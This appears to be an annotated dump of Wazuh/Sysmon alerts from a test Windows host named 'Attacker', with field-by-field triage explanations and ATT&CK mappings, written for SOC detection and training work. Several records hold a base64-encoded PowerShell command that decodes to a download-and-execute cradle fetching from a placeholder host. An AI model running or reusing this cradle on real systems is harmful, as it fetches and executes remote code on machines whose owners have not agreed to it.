data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc9-680a-b70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2176
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:57.909+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:57.909+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534217.1057445
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:02.0618898Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282424
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:02.054 ProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00} ProcessId: 12264 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_awmsnad4.ya2.ps1 CreationUtcTime: 2025-04-24 22:36:02.054 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:02.054
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd0-680a-c60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12264
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awmsnad4.ya2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:02.054
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:58.078+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.078+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1060214
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:03.6012258Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282438
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:03.520 ProcessGuid: {94294ddc-bcd3-680a-ca0a-000000000e00} ProcessId: 13664 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00} ParentProcessId: 2332 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:03.520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd3-680a-ca0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcca-680a-c10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2332
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:58.268+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.268+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1065269
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:04.4484774Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282461
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:03.117 ProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00} ProcessId: 11368 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00} ParentProcessId: 12264 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:03.117
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd3-680a-c80a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd0-680a-c60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12264
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:58.283+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.283+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1073340
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:04.6354631Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282462
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:04.632 ProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00} ProcessId: 11368 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zrwibxxr.3hb.ps1 CreationUtcTime: 2025-04-24 22:36:04.632 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:04.632
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd3-680a-c80a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

